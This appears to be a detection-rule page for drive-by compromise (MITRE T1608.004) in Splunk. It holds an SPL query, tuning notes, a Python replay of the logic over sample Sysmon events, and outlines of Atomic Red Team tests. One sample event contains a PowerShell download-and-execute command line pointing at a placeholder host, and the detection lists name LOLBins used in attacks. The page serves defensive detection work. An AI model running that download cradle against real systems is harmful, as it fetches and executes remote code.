T1608.004 Splunk · SPL

Detect Drive-by Target in Splunk

Adversaries prepare operational websites to infect systems that visit them in the normal course of browsing. This involves staging malicious JavaScript, exploit kit landing pages, browser profiling code (e.g., ScanBox), or trojanized downloads on adversary-controlled or compromised legitimate websites, including watering hole attacks that target specific communities such as government agencies, industries, or regional groups. Staging methods include injecting malicious scripts into existing web pages, modifying files served from publicly writable cloud storage buckets, and purchasing malvertising space. Because staging occurs entirely on adversary infrastructure, the staging itself cannot be observed from the victim side. Detection therefore focuses on the downstream artifacts left on the victim: browsers spawning unexpected child processes (an exploitation indicator), executable files written by browser processes to temp directories, and browser network connections to newly registered or cloud-hosted infrastructure that serves executable content.

MITRE ATT&CK

Tactic
Resource Development
Technique
T1608 Stage Capabilities
Sub-technique
T1608.004 Drive-by Target
Canonical reference
https://attack.mitre.org/techniques/T1608/004/

SPL Detection Query

Splunk (SPL)

(index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
  (ParentImage="*\\chrome.exe" OR ParentImage="*\\firefox.exe" OR ParentImage="*\\msedge.exe"
   OR ParentImage="*\\iexplore.exe" OR ParentImage="*\\brave.exe" OR ParentImage="*\\opera.exe"
   OR ParentImage="*\\microsoftedge.exe")
  (Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\wscript.exe"
   OR Image="*\\cscript.exe" OR Image="*\\mshta.exe" OR Image="*\\rundll32.exe"
   OR Image="*\\regsvr32.exe" OR Image="*\\schtasks.exe" OR Image="*\\certutil.exe"
   OR Image="*\\bitsadmin.exe" OR Image="*\\msiexec.exe" OR Image="*\\wmic.exe"
   OR Image="*\\msbuild.exe" OR Image="*\\pcalua.exe"))
OR
(index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11
  (Image="*\\chrome.exe" OR Image="*\\firefox.exe" OR Image="*\\msedge.exe"
   OR Image="*\\iexplore.exe" OR Image="*\\brave.exe" OR Image="*\\opera.exe"
   OR Image="*\\microsoftedge.exe")
  (TargetFilename="*\\Temp\\*.exe" OR TargetFilename="*\\Temp\\*.dll"
   OR TargetFilename="*\\Temp\\*.hta" OR TargetFilename="*\\Temp\\*.vbs"
   OR TargetFilename="*\\Temp\\*.ps1" OR TargetFilename="*\\Temp\\*.js"
   OR TargetFilename="*\\Temp\\*.bat" OR TargetFilename="*\\Temp\\*.scr"
   OR TargetFilename="*\\Users\\Public\\*.exe" OR TargetFilename="*\\Users\\Public\\*.dll"))
| eval DetectionType=case(
    EventCode==1, "BrowserSpawnedProcess",
    EventCode==11, "BrowserDroppedFile",
    true(), "Unknown")
| eval RiskScore=case(
    EventCode==1 AND match(Image, "(?i)(powershell\.exe|mshta\.exe|wscript\.exe|cscript\.exe|msbuild\.exe)$"), 3,
    EventCode==1 AND match(Image, "(?i)(rundll32\.exe|regsvr32\.exe|certutil\.exe|bitsadmin\.exe|pcalua\.exe)$"), 2,
    EventCode==1, 1,
    EventCode==11 AND match(TargetFilename, "(?i)\.(exe|dll|hta|vbs|ps1)$"), 3,
    EventCode==11 AND match(TargetFilename, "(?i)\.(js|bat|cmd|scr)$"), 2,
    true(), 1)
| eval ChildOrFile=if(EventCode==11, TargetFilename, Image)
| eval BrowserParent=if(EventCode==11, Image, ParentImage)
| table _time, host, User, DetectionType, BrowserParent, ChildOrFile, CommandLine, ParentCommandLine, RiskScore
| sort - RiskScore _time

Severity: high · Confidence: medium

Detects victim-side indicators of drive-by exploitation using Sysmon events in Splunk. EventCode=1 (Process Create) identifies browsers spawning suspicious child processes, including shells, script interpreters, and LOLBins, which is the primary indicator of successful browser exploitation. EventCode=11 (File Create) identifies browsers writing executable file types to temp or public directories, consistent with a drive-by payload being staged on disk. For Event ID 11 the browser is the Image (the writing process) and the payload is the TargetFilename, so the query normalises both event types into BrowserParent and ChildOrFile columns. Risk scoring (1-3) ranks script interpreters and directly executable file types highest so that analysts triage the most critical alerts first.

Data Sources

  • Process: Process Creation
  • File: File Creation
  • Sysmon Event ID 1
  • Sysmon Event ID 11

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • Browser extensions or plugins spawning helper processes for legitimate functionality such as PDF viewers, media players, or accessibility tools
  • Legitimate browser update pipelines invoking msiexec.exe or cmd.exe to apply browser or extension updates
  • Developer tool integrations where browser extensions launch local build scripts, Node.js processes, or test runners
  • Enterprise custom protocol handlers (registered URI schemes) that invoke local desktop applications or batch scripts from browser clicks
  • Download managers integrated with browsers writing executable installers to the Downloads or Temp directory before user-triggered installation
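The detection logic above and the tuning it needs can be replayed outside Splunk. The following is an added example, not code from the original page: it applies the same rules as the SPL query (browser parent plus shell, script interpreter or LOLBin child for Event ID 1; browser writing an executable file type under Temp or Users\Public for Event ID 11) to constructed Sysmon-style events, assigns the 1-3 RiskScore, and suppresses matches against an allowlist of the kind the false-positive list calls for. It generalises slightly in that every listed extension is checked under Users\Public, not only .exe and .dll. All events, paths, command lines and the allowlist entry are constructed sample data; the update-pipeline entry is hypothetical.

```python
"""Replay of the T1608.004 victim-side detection logic over constructed Sysmon events.

Added example (not the page's own code). Mirrors the SPL query's two branches and
its RiskScore tiers, then applies an analyst allowlist for known-good browser
child processes. Sample data below is constructed, not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import Optional

BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
            "brave.exe", "opera.exe", "microsoftedge.exe"}
# Child-process tiers mirror the RiskScore case() branches for Event ID 1.
CHILD_RISK = {
    3: {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "msbuild.exe"},
    2: {"rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "pcalua.exe"},
    1: {"cmd.exe", "schtasks.exe", "msiexec.exe", "wmic.exe"},
}
# Dropped-file tiers for Event ID 11, applied to files written under Temp or Users\Public.
FILE_RISK = {3: {".exe", ".dll", ".hta", ".vbs", ".ps1"}, 2: {".js", ".bat", ".cmd", ".scr"}}
DROP_DIRS = re.compile(r"\\(Temp|Users\\Public)\\", re.IGNORECASE)

# Hypothetical allowlist an analyst would maintain (a lookup table in Splunk):
# (browser, child process, substring that must appear in the command line).
ALLOWLIST = [("msedge.exe", "msiexec.exe", "MicrosoftEdgeUpdate")]


@dataclass
class Alert:
    detection_type: str
    browser_parent: str
    child_or_file: str
    risk: int


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def extension(path: str) -> str:
    name = basename(path)
    return name[name.rfind("."):] if "." in name else ""


def tier(value: str, table: dict) -> int:
    """Risk tier for a child-process name or file extension, 0 if not listed."""
    return next((score for score, members in table.items() if value in members), 0)


def evaluate(event: dict, allowlist=ALLOWLIST) -> Optional[Alert]:
    """Return an Alert for one Sysmon event, or None if it does not match."""
    code = int(event["EventCode"])
    if code == 1:  # Process Create: browser spawned a suspicious child
        parent, child = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
        risk = tier(child, CHILD_RISK)
        if parent not in BROWSERS or risk == 0:
            return None
        cmdline = event.get("CommandLine", "").lower()
        if any(parent == b and child == c and needle.lower() in cmdline for b, c, needle in allowlist):
            return None  # known-good update pipeline or helper process; suppressed
        return Alert("BrowserSpawnedProcess", parent, child, risk)
    if code == 11:  # File Create: browser wrote an executable file type to a drop directory
        writer, target = basename(event.get("Image", "")), event.get("TargetFilename", "")
        risk = tier(extension(target), FILE_RISK)
        if writer not in BROWSERS or risk == 0 or not DROP_DIRS.search(target):
            return None
        return Alert("BrowserDroppedFile", writer, target, risk)
    return None


def triage(events, allowlist=ALLOWLIST):
    """Alerts for all matching events, highest RiskScore first (the query's sort order)."""
    alerts = [a for a in (evaluate(e, allowlist) for e in events) if a is not None]
    return sorted(alerts, key=lambda a: -a.risk)


# Constructed sample events; paths and command lines are illustrative only.
SAMPLE_EVENTS = [
    {"EventCode": "1", "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -Command IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/a'))"},
    {"EventCode": "1", "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i MicrosoftEdgeUpdate.msi /quiet"},
    {"EventCode": "11", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
    {"EventCode": "11", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\report.pdf"},
    {"EventCode": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventCode": "11", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\Public\lure.js"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Running the block yields three alerts: the Chrome-spawned PowerShell and the Firefox-written Temp\update.exe at risk 3, then the Chrome-written Users\Public\lure.js at risk 2. The Edge-spawned msiexec.exe is suppressed by the allowlist entry, the PDF in Downloads never matches, and cmd.exe under explorer.exe has no browser parent. In Splunk the same suppression is normally expressed as a lookup joined on the browser and child image with a command-line pattern, kept outside the query so that tuning does not require editing the detection.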

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Simulate Browser-Spawned Command Shell (Drive-by Exploitation Process Artifact)

    Expected signal: Sysmon Event ID 1: Process Create with Image=cmd.exe, CommandLine containing 'driveby-spawn-test'. ParentImage=powershell.exe in this test (in a real attack, ParentImage would be chrome.exe or msedge.exe). Sysmon Event ID 11: File Create for driveby-spawn-test.txt in %TEMP%. Security Event ID 4688 (if command line auditing enabled) showing cmd.exe process creation with full command line.

  2. Test 2: Browser Executable File Drop to Temp Directory (Drive-by Payload Staging)

    Expected signal: Sysmon Event ID 11: File Create with TargetFilename=%TEMP%\driveby-payload-test.exe, initiating process=powershell.exe (would be chrome.exe/msedge.exe in a real attack). The file begins with the MZ magic bytes of a PE executable; at 8 bytes it is a stub rather than a loadable PE, which is enough to exercise extension- and header-based checks. The SHA256 hash of the 8-byte file will be logged by Defender.

  3. Test 3: Drive-by Browser Fingerprinting Page Simulation (ScanBox-Style Reconnaissance)

    Expected signal: Sysmon Event ID 1: Process Create for msedge.exe with --headless flag and file:// URI pointing to staged HTML. Sysmon Event ID 11: File Create for scanbox-sim.html in %TEMP% by PowerShell. Sysmon Event ID 3: Network Connection attempt from msedge.exe to 127.0.0.1:19876 (connection will fail — no listener — but the event fires). Browser console output (captured via --dump-dom) shows the fingerprinting script execution.

  4. Test 4: Watering Hole Injection Simulation (Malicious Script Tag in Web Page)

    Expected signal: Sysmon Event ID 11: File Create for watering-hole-sim.html in %TEMP% by PowerShell. The file contains hex-encoded JavaScript obfuscation patterns (\x64\x6f\x63...) and Base64-encoded lure text matching SocGholish-style fake browser update prompts. SHA256 of the file can be submitted to threat intel platforms. In a real attack, this content would be injected into a legitimate website's HTML and served to visitors.

Unlock Pro Content

Get the full detection package for T1608.004 including response playbook, investigation guide, and atomic red team tests.
